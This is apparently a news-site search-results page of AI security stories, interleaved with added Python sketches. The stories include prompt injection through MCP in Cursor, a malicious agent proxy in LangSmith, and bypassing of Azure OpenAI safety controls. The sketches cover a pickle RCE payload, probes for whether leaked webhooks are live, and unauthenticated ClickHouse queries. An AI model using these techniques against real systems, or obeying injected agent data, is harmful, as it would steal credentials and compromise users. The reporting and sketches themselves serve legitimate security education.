Search results for api keys openai api | Breaking Cybersecurity News | The Hacker News

LangSmith Bug Could Expose OpenAI Keys and User Data via Malicious Agents

Jun 17, 2025 Vulnerability / LLM Security
Cybersecurity researchers have disclosed a now-patched security flaw in LangChain's LangSmith platform that could be exploited to capture sensitive data, including API keys and user prompts. The vulnerability, which carries a CVSS score of 8.8 out of a maximum of 10.0, has been codenamed AgentSmith by Noma Security. LangSmith is an observability and evaluation platform that allows users to develop, test, and monitor large language model (LLM) applications, including those built using LangChain. The service also offers what's called a LangChain Hub, which acts as a repository for all publicly listed prompts, agents, and models. "This newly identified vulnerability exploited unsuspecting users who adopt an agent containing a pre-configured malicious proxy server uploaded to 'Prompt Hub,'" researchers Sasi Levi and Gal Moyal said in a report shared with The Hacker News. "Once adopted, the malicious proxy discreetly intercepted all user communicatio...
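A minimal sketch of why a "pre-configured malicious proxy" captures keys (this is illustrative, not Noma Security's proof of concept): any OpenAI-compatible client sends its API key in the Authorization header of every request to whatever base URL it is configured with, so an agent shipped with an attacker-controlled base URL hands over both the key and the prompt. The proxy hostname below is a placeholder.

```python
import json
import urllib.request

# Hypothetical attacker-controlled proxy baked into a shared agent's config.
ATTACKER_PROXY = "https://proxy.example.invalid/v1"

def build_chat_request(base_url: str, api_key: str, prompt: str):
    """Build the HTTP request a proxied OpenAI-style client would emit."""
    body = {"model": "gpt-4o", "messages": [{"role": "user", "content": prompt}]}
    return urllib.request.Request(
        url=f"{base_url}/chat/completions",
        data=json.dumps(body).encode(),
        headers={
            "Authorization": f"Bearer {api_key}",  # the secret travels to the proxy host
            "Content-Type": "application/json",
        },
        method="POST",
    )

req = build_chat_request(ATTACKER_PROXY, "sk-demo-not-a-real-key", "hello")
# Whoever operates the proxy sees both the destination and the bearer token:
print(req.full_url)
print(req.get_header("Authorization"))
```

Nothing in the request itself distinguishes a legitimate proxy from a malicious one, which is why the attack needed no exploit beyond getting users to adopt the agent.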
Microsoft Sues Hacking Group Exploiting Azure AI for Harmful Content Creation

Jan 11, 2025 AI Security / Cybersecurity
Microsoft has revealed that it's pursuing legal action against a "foreign-based threat actor group" for operating a hacking-as-a-service infrastructure to intentionally get around the safety controls of its generative artificial intelligence (AI) services and produce offensive and harmful content. The tech giant's Digital Crimes Unit (DCU) said it has observed the threat actors "develop sophisticated software that exploited exposed customer credentials scraped from public websites," and "sought to identify and unlawfully access accounts with certain generative AI services and purposely alter the capabilities of those services." The adversaries then used these services, such as Azure OpenAI Service, and monetized the access by selling them to other malicious actors, providing them with detailed instructions as to how to use these custom tools to generate harmful content. Microsoft said it discovered the activity in July 2024. The Windows maker...
Python's PyPI Reveals Its Secrets

Apr 11, 2024 Software Security / Programming
GitGuardian is famous for its annual State of Secrets Sprawl report. In their 2023 report, they found over 10 million passwords, API keys, and other credentials exposed in public GitHub commits. The takeaways in their 2024 report did not just highlight 12.8 million new exposed secrets in GitHub, but a number in the popular Python package repository PyPI. PyPI, short for the Python Package Index, hosts over 20 terabytes of files that are freely available for use in Python projects. If you've ever typed pip install [name of package], it likely pulled that package from PyPI. A lot of people use it too. Whether it's GitHub, PyPI, or others, the report states, "open-source packages make up an estimated 90% of the code run in production today." It's easy to see why that is when these packages help developers avoid the reinvention of millions of wheels every day. In the 2024 report, GitGuardian reported finding over 11,000 exposed unique...
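At its core, the detection step a scanner like GitGuardian performs is pattern matching over file contents for known credential formats. A toy sketch (the patterns below are illustrative examples of well-known formats, not GitGuardian's actual rule set):

```python
import re

# Illustrative credential-format patterns; real scanners maintain hundreds
# of these plus entropy checks and validity probes.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "slack_webhook": re.compile(r"https://hooks\.slack\.com/services/T\w+/B\w+/\w+"),
}

def scan_text(text: str):
    """Return (pattern_name, matched_string) pairs found in a file's contents."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((name, m.group()))
    return hits

# Flags the well-known AWS documentation example key:
print(scan_text('config = {"key": "AKIAIOSFODNN7EXAMPLE"}'))
```

Running this over every file in every published package version is essentially what surfaces secrets in a registry like PyPI, which is why a key committed even briefly should be treated as burned.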
Meta's Llama Framework Flaw Exposes AI Systems to Remote Code Execution Risks

Jan 26, 2025 AI Security / Vulnerability
A high-severity security flaw has been disclosed in Meta's Llama large language model (LLM) framework that, if successfully exploited, could allow an attacker to execute arbitrary code on the llama-stack inference server. The vulnerability, tracked as CVE-2024-50050, has been assigned a CVSS score of 6.3 out of 10.0. Supply chain security firm Snyk, on the other hand, has assigned it a critical severity rating of 9.3. "Affected versions of meta-llama are vulnerable to deserialization of untrusted data, meaning that an attacker can execute arbitrary code by sending malicious data that is deserialized," Oligo Security researcher Avi Lumelsky said in an analysis earlier this week. The shortcoming, per the cloud security company, resides in a component called Llama Stack, which defines a set of API interfaces for artificial intelligence (AI) application development, including using Meta's own Llama models. Specifically, it has to do with a remote code execution ...
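Why "deserialization of untrusted data" translates directly to code execution: Python's pickle format lets an object specify, via __reduce__, a callable to invoke during loading, so a crafted byte stream runs attacker-chosen code the moment it is deserialized. A self-contained demonstration with a harmless callable (in a real exploit it would be something like os.system):

```python
import pickle

class Payload:
    def __reduce__(self):
        # (callable, args) tuple: pickle invokes this at pickle.loads() time.
        # Harmless here, but the callable is entirely attacker-controlled.
        return (print, ("code ran during deserialization",))

malicious_bytes = pickle.dumps(Payload())
pickle.loads(malicious_bytes)  # prints the message before returning anything
```

This is why any service that unpickles bytes received over the network, as the vulnerable inference server did, is effectively offering remote code execution to anyone who can reach it.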
12,000+ API Keys and Passwords Found in Public Datasets Used for LLM Training

Feb 28, 2025 Machine Learning / Data Privacy
A dataset used to train large language models (LLMs) has been found to contain nearly 12,000 live secrets, which allow for successful authentication. The findings once again highlight how hard-coded credentials pose a severe security risk to users and organizations alike, not to mention compounding the problem when LLMs end up suggesting insecure coding practices to their users. Truffle Security said it downloaded a December 2024 archive from Common Crawl, which maintains a free, open repository of web crawl data. The massive dataset contains over 250 billion pages spanning 18 years. The archive specifically contains 400TB of compressed web data, 90,000 WARC files (Web ARChive format), and data from 47.5 million hosts across 38.3 million registered domains. The company's analysis found that there are 219 different secret types in the Common Crawl archive, including Amazon Web Services (AWS) root keys, Slack webhooks, and Mailchimp API keys. "'Live' secrets ar...
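The "live" distinction matters: a secret only counts if the service still accepts it. A hedged sketch of that triage step for one secret type, Slack webhooks (the endpoint behavior and status handling here are assumptions for illustration, not Truffle Security's actual pipeline; the network call is injectable so the logic can be exercised offline):

```python
import urllib.request
import urllib.error

def is_live_slack_webhook(url: str, opener=urllib.request.urlopen) -> bool:
    """A webhook that accepts a POST is still active; an HTTP error means
    it was deleted or its token revoked. `opener` is injectable for testing."""
    req = urllib.request.Request(
        url,
        data=b'{"text": "liveness probe"}',
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with opener(req) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False

# Fake opener so the sketch runs without touching the network:
class FakeResp:
    status = 200
    def __enter__(self): return self
    def __exit__(self, *exc): return False

print(is_live_slack_webhook("https://hooks.slack.com/services/T0/B0/x",
                            opener=lambda req: FakeResp()))  # True
```

Scaled across 219 secret types, this verification step is what separates the nearly 12,000 live credentials from the much larger pile of matched-but-dead strings.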
ChatGPT Security: OpenAI's Bug Bounty Program Offers Up to $20,000 Prizes

Apr 13, 2023 Software Security / Bug Hunting
OpenAI, the company behind the massively popular ChatGPT AI chatbot, has launched a bug bounty program in an attempt to ensure its systems are "safe and secure." To that end, it has partnered with the crowdsourced security platform Bugcrowd for independent researchers to report vulnerabilities discovered in its product in exchange for rewards ranging from "$200 for low-severity findings to up to $20,000 for exceptional discoveries." It's worth noting that the program does not cover model safety or hallucination issues, wherein the chatbot is prompted to generate malicious code or other faulty outputs. The company noted that "addressing these issues often involves substantial research and a broader approach." Other prohibited categories are denial-of-service (DoS) attacks, brute-forcing OpenAI APIs, and demonstrations that aim to destroy data or gain unauthorized access to sensitive information beyond what's necessary to highlight the prob...
Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

Aug 01, 2025 Vulnerability / DevOps
Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed EchoLeak. "Cursor runs with developer-level privileges, and when paired with an MCP server that fetches untrusted external data, that data can redirect the agent's control flow and exploit those privileges," the Aim Labs Team said in a report shared with The Hacker News. "By feeding poisoned data to the agent via MCP, an attacker can gain full remote code execution under the user privileges, and achieve any number of things, including opportunities for ransomware, data theft, AI manipulation and hallucinations, etc." In other words, the remote code execution can trigg...
⚡ Weekly Recap: Windows 0-Day, VPN Exploits, Weaponized AI, Hijacked Antivirus and More

Apr 14, 2025 Threat Intelligence / Cybersecurity
Attackers aren't waiting for patches anymore — they are breaking in before defenses are ready. Trusted security tools are being hijacked to deliver malware. Even after a breach is detected and patched, some attackers stay hidden. This week's events show a hard truth: it's not enough to react after an attack. You have to assume that any system you trust today could fail tomorrow. In a world where AI tools can be used against you and ransomware hits faster than ever, real protection means planning for things to go wrong — and still staying in control. Check out this week's update to find important threat news, helpful webinars, useful tools, and tips you can start using right away.

⚡ Threat of the Week

Windows 0-Day Exploited for Ransomware Attacks — A security flaw affecting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets, Microsoft revealed. The flaw, CVE-2025-29824, is a privilege escalation vulnerabilit...
Researchers Uncover Vulnerabilities in Open-Source AI and ML Models

Oct 29, 2024 AI Security / Vulnerability
A little over three dozen security vulnerabilities have been disclosed in various open-source artificial intelligence (AI) and machine learning (ML) models, some of which could lead to remote code execution and information theft. The flaws, identified in tools like ChuanhuChatGPT, Lunary, and LocalAI, have been reported as part of Protect AI's Huntr bug bounty platform. The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs):

- CVE-2024-7474 (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss
- CVE-2024-7475 (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information

Also discovered in Lunary is anot...
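An IDOR like CVE-2024-7474 boils down to an endpoint trusting a user-supplied object identifier without checking who owns the object. A minimal sketch of the missing authorization check (the data model and names are illustrative, not Lunary's code):

```python
# Toy multi-tenant store: each record belongs to one organization.
USERS = {
    1: {"owner_org": "acme", "email": "a@acme.test"},
    2: {"owner_org": "globex", "email": "b@globex.test"},
}

def get_user(requester_org: str, user_id: int):
    """Fetch a user record; refuses cross-tenant access.
    An IDOR-vulnerable handler would skip the ownership check and
    return any record whose id the caller guesses."""
    record = USERS.get(user_id)
    if record is None:
        return None
    if record["owner_org"] != requester_org:
        raise PermissionError("object belongs to another tenant")
    return record

print(get_user("acme", 1)["email"])  # allowed: same tenant
try:
    get_user("acme", 2)              # blocked: id 2 belongs to globex
except PermissionError as e:
    print(e)
```

The fix is never to hide the identifiers (they are usually sequential or guessable) but to enforce this ownership check on every object lookup.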
⚡ Weekly Recap: Hot CVEs, npm Worm Returns, Firefox RCE, M365 Email Raid & More

Dec 01, 2025 Hacking News / Cybersecurity
Hackers aren't kicking down the door anymore. They just use the same tools we use every day — code packages, cloud accounts, email, chat, phones, and "trusted" partners — and turn them against us. One bad download can leak your keys. One weak vendor can expose many customers at once. One guest invite, one link on a phone, one bug in a common tool, and suddenly your mail, chats, repos, and servers are in play. Every story below is a reminder that your "safe" tools might be the real weak spot.

⚡ Threat of the Week

Shai-Hulud Returns with More Aggression — The npm registry was targeted a second time by a self-replicating worm that went by the moniker "Sha1-Hulud: The Second Coming," affecting over 800 packages and 27,000 GitHub repositories. Like in the previous iteration, the main objective was to steal sensitive data like API keys, cloud credentials, and npm and GitHub authentication information, and facilitate deeper supply chain compromise in a worm-like fashion. Th...
Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44

Jul 29, 2025 LLM Security / Vulnerability
Cybersecurity researchers have disclosed a now-patched critical security flaw in a popular vibe coding platform called Base44 that could allow unauthorized access to private applications built by its users. "The vulnerability we discovered was remarkably simple to exploit -- by providing only a non-secret 'app_id' value to undocumented registration and email verification endpoints, an attacker could have created a verified account for private applications on their platform," cloud security firm Wiz said in a report shared with The Hacker News. The net result of this issue is a bypass of all authentication controls, including Single Sign-On (SSO) protections, granting full access to all the private applications and data contained within them. Following responsible disclosure on July 9, 2025, an official fix was rolled out by Wix, which owns Base44, within 24 hours. There is no evidence that the issue was ever maliciously exploited in the wild. While vibe codin...
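The underlying mistake is gating registration on a value the attacker already knows (the public app_id). A hedged sketch of the class of fix: require a secret the server issues only to invited users and that cannot be derived from the app_id. The HMAC scheme and all names below are illustrative assumptions, not Base44's actual remediation.

```python
import hmac
import hashlib
import secrets

# Server-side signing key; never leaves the backend.
SERVER_KEY = secrets.token_bytes(32)

def issue_invite(app_id: str) -> str:
    """Signed invite token bound to one app, issued only to invited users."""
    return hmac.new(SERVER_KEY, app_id.encode(), hashlib.sha256).hexdigest()

def register(app_id: str, invite_token: str) -> bool:
    """Registration succeeds only with a valid invite for that exact app."""
    expected = hmac.new(SERVER_KEY, app_id.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, invite_token)

token = issue_invite("app_1234")
print(register("app_1234", token))       # True: invited user
print(register("app_1234", "app_1234"))  # False: knowing app_id alone is not enough
```

Binding the token to the app_id via the HMAC also means an invite for one application cannot be replayed against another.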
DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

Jan 30, 2025 Artificial Intelligence / Data Privacy
Buzzy Chinese artificial intelligence (AI) startup DeepSeek, which has had a meteoric rise in popularity in recent days, left one of its databases exposed on the internet, which could have allowed malicious actors to gain access to sensitive data. The ClickHouse database "allows full control over database operations, including the ability to access internal data," Wiz security researcher Gal Nagli said. The exposure also includes more than a million lines of log streams containing chat history, secret keys, backend details, and other highly sensitive information, such as API secrets and operational metadata. DeepSeek has since plugged the security hole following attempts by the cloud security firm to contact them. The database, hosted at oauth2callback.deepseek[.]com:9000 and dev.deepseek[.]com:9000, is said to have enabled unauthorized access to a wide range of information. The exposure, Wiz noted, allowed for complete database control and potential privilege escalati...
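What makes an exposed ClickHouse instance so immediately dangerous: its HTTP interface executes SQL passed in the `query` URL parameter, so when the default user has no password, anyone who can reach the port can enumerate and read the data with a plain GET request. A sketch of how such a probe URL is constructed (the hostname is a placeholder; this does not perform any network access):

```python
from urllib.parse import urlencode

def probe_url(host: str, port: int, sql: str) -> str:
    """Build the URL that ClickHouse's HTTP interface would execute as SQL."""
    return f"http://{host}:{port}/?{urlencode({'query': sql})}"

print(probe_url("db.example.invalid", 9000, "SHOW TABLES"))
# -> http://db.example.invalid:9000/?query=SHOW+TABLES
```

From there, the same mechanism serves `SELECT` queries against any table — which is why an unauthenticated, internet-facing instance amounts to full read (and often write) access to everything it stores.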
Malicious Nx Packages in ‘s1ngularity’ Attack Leaked 2,349 GitHub, Cloud, and AI Credentials

Aug 28, 2025 AI Security / Cloud Security
The maintainers of the nx build system have alerted users to a supply chain attack that allowed attackers to publish malicious versions of the popular npm package and other auxiliary plugins with data-gathering capabilities. "Malicious versions of the nx package, as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials, and posts them to GitHub as a repo under the user's accounts," the maintainers said in an advisory published Wednesday. Nx is an open-source, technology-agnostic build platform that's designed to manage codebases. It's advertised as an "AI-first build platform that connects everything from your editor to CI [continuous integration]." The npm package has over 3.5 million weekly downloads. The list of affected packages and versions is below. These versions have since been removed from the npm registry. The compromise of the nx package took place on August 26, 20...
From Misuse to Abuse: AI Risks and Attacks

Oct 16, 2024 Artificial Intelligence / Cybercrime
AI from the attacker's perspective: See how cybercriminals are leveraging AI and exploiting its vulnerabilities to compromise systems, users, and even other AI applications.

Cybercriminals and AI: The Reality vs. Hype

"AI will not replace humans in the near future. But humans who know how to use AI are going to replace those humans who don't know how to use AI," says Etay Maor, Chief Security Strategist at Cato Networks and founding member of Cato CTRL. "Similarly, attackers are also turning to AI to augment their own capabilities." Yet, there is a lot more hype than reality around AI's role in cybercrime. Headlines often sensationalize AI threats, with terms like "Chaos-GPT" and "Black Hat AI Tools," even claiming they seek to destroy humanity. However, these articles are more fear-inducing than descriptive of serious threats. For instance, when explored in underground forums, several of these so-called "AI cyber tools" were found to be nothing...